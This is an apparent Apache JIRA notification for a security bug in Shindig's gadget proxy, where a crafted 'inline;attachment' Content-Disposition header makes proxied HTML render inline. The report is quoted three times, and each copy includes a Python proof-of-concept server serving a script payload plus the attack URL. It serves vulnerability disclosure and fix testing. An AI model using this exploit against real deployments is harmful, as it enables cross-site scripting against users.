[
https://issues.apache.org/jira/browse/SHINDIG-1977?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
federico lanusse updated SHINDIG-1977:
--------------------------------------
Description:
While I was trying to figure why swf files are render as is instead of force
download I found this code in the last repo
org.apache.shindig.gadgets.servlet.ProxyHandler#setResponseContentHeaders
{code}
if (StringUtils.isBlank(contentDispositionValue)
|| contentDispositionValue.indexOf("attachment;") == -1
|| contentDispositionValue.indexOf("filename") == -1) \{
response.setHeader("Content-Disposition", "attachment;filename=p.txt");
} else \{
response.setHeader("Content-Disposition", contentDispositionValue);
}
{code}
Is possible to break the Content-Disposition header if we set it to something
like this: *"Content-Disposition: inline;attachment;filename=a.html"*
If an attacker creates a server and then redirect user to the shindig proxy in
the target server, is possible to render the html as is instead of a safe
download.
bq.
http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
I had only check this in the dev version, not sure if it out in the wild.
Acceptance Test:
# Run the shinding server (per.
http://shindig.apache.org/documentation_building_java.html): mvn -Prun
# Run a server that add the "Content-Disposition:
inline;attachment;filename=a.html" in the response headers (PoC at the end)
# Browse to
http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
Verify that html or any other file are force to download
##########################################################
server code python
{code}
#!/usr/bin/python
import BaseHTTPServer, SimpleHTTPServer
from urlparse import urlparse, parse_qs
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
print(self.headers)
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Disposition",
"inline;attachment;filename=a.html")
self.end_headers()
self.wfile.write("<!DOCTYPE html><html> <head> <title>This is a
title</title> <script>alert(document.location)</script></head> <body>
<p>Hello world!</p> </body></html>")
try:
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8081), MyHandler)
httpd.serve_forever()
except KeyboardInterrupt:
print('^C received, shutting down server')
httpd.socket.close()
{code}
!shindig_poc_01.PNG!
was:
While I was trying to figure why swf files are render as is instead of force
download I found this code in the last repo
org.apache.shindig.gadgets.servlet.ProxyHandler#setResponseContentHeaders
{code}
if (StringUtils.isBlank(contentDispositionValue)
|| contentDispositionValue.indexOf("attachment;") == -1
|| contentDispositionValue.indexOf("filename") == -1) \{
response.setHeader("Content-Disposition", "attachment;filename=p.txt");
} else \{
response.setHeader("Content-Disposition", contentDispositionValue);
}
{code}
Is possible to break the Content-Disposition header if we set it to something
like this: *"Content-Disposition: inline;attachment;filename=a.html"*
If an attacker creates a server and then redirect user to the shindig proxy in
the target server, is possible to render the html as is instead of a safe
download.
bq.
http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
I had only check this in the dev version, not sure if it out in the wild.
Acceptance Test:
# Run the shinding server (per.
http://shindig.apache.org/documentation_building_java.html): mvn -Prun
# Run a server that add the "Content-Disposition:
inline;attachment;filename=a.html" in the response headers (PoC at the end)
# Browse to
http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
Verify that html or any other file are force to download
##########################################################
server code python
{code}
#!/usr/bin/python
import BaseHTTPServer, SimpleHTTPServer
from urlparse import urlparse, parse_qs
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
print(self.headers)
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Disposition",
"inline;attachment;filename=a.html")
self.end_headers()
self.wfile.write("<!DOCTYPE html><html> <head> <title>This is a
title</title> <script>alert(document.location)</script></head> <body>
<p>Hello world!</p> </body></html>")
try:
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8081), MyHandler)
httpd.serve_forever()
except KeyboardInterrupt:
print('^C received, shutting down server')
httpd.socket.close()
{code}
img:http://k38.kn3.net/08474FFAC.png
!http://k38.kn3.net/08474FFAC.png!
> Content-Disposition overrides leads to XSS vector
> -------------------------------------------------
>
> Key: SHINDIG-1977
> URL: https://issues.apache.org/jira/browse/SHINDIG-1977
> Project: Shindig
> Issue Type: Bug
> Components: Java
> Affects Versions: 2.5.2
> Reporter: federico lanusse
> Priority: Critical
> Labels: security
> Attachments: shindig_POC_server.py, shindig_poc.PNG,
> shindig_poc_01.PNG
>
>
> While I was trying to figure why swf files are render as is instead of force
> download I found this code in the last repo
> org.apache.shindig.gadgets.servlet.ProxyHandler#setResponseContentHeaders
> {code}
> if (StringUtils.isBlank(contentDispositionValue)
> || contentDispositionValue.indexOf("attachment;") == -1
> || contentDispositionValue.indexOf("filename") == -1) \{
> response.setHeader("Content-Disposition",
> "attachment;filename=p.txt");
> } else \{
> response.setHeader("Content-Disposition", contentDispositionValue);
> }
> {code}
> Is possible to break the Content-Disposition header if we set it to something
> like this: *"Content-Disposition: inline;attachment;filename=a.html"*
> If an attacker creates a server and then redirect user to the shindig proxy
> in the target server, is possible to render the html as is instead of a safe
> download.
> bq.
> http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
> I had only check this in the dev version, not sure if it out in the wild.
> Acceptance Test:
> # Run the shinding server (per.
> http://shindig.apache.org/documentation_building_java.html): mvn -Prun
> # Run a server that add the "Content-Disposition:
> inline;attachment;filename=a.html" in the response headers (PoC at the end)
> # Browse to
> http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
> Verify that html or any other file are force to download
> ##########################################################
> server code python
> {code}
> #!/usr/bin/python
> import BaseHTTPServer, SimpleHTTPServer
> from urlparse import urlparse, parse_qs
> class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
> def do_GET(self):
> print(self.headers)
> self.send_response(200)
> self.send_header("Content-Type", "text/html")
> self.send_header("Content-Disposition",
> "inline;attachment;filename=a.html")
> self.end_headers()
> self.wfile.write("<!DOCTYPE html><html> <head> <title>This is a
> title</title> <script>alert(document.location)</script></head> <body>
> <p>Hello world!</p> </body></html>")
> try:
> httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8081), MyHandler)
> httpd.serve_forever()
> except KeyboardInterrupt:
> print('^C received, shutting down server')
> httpd.socket.close()
> {code}
> !shindig_poc_01.PNG!
--
This message was sent by Atlassian JIRA
(v6.2#6252)
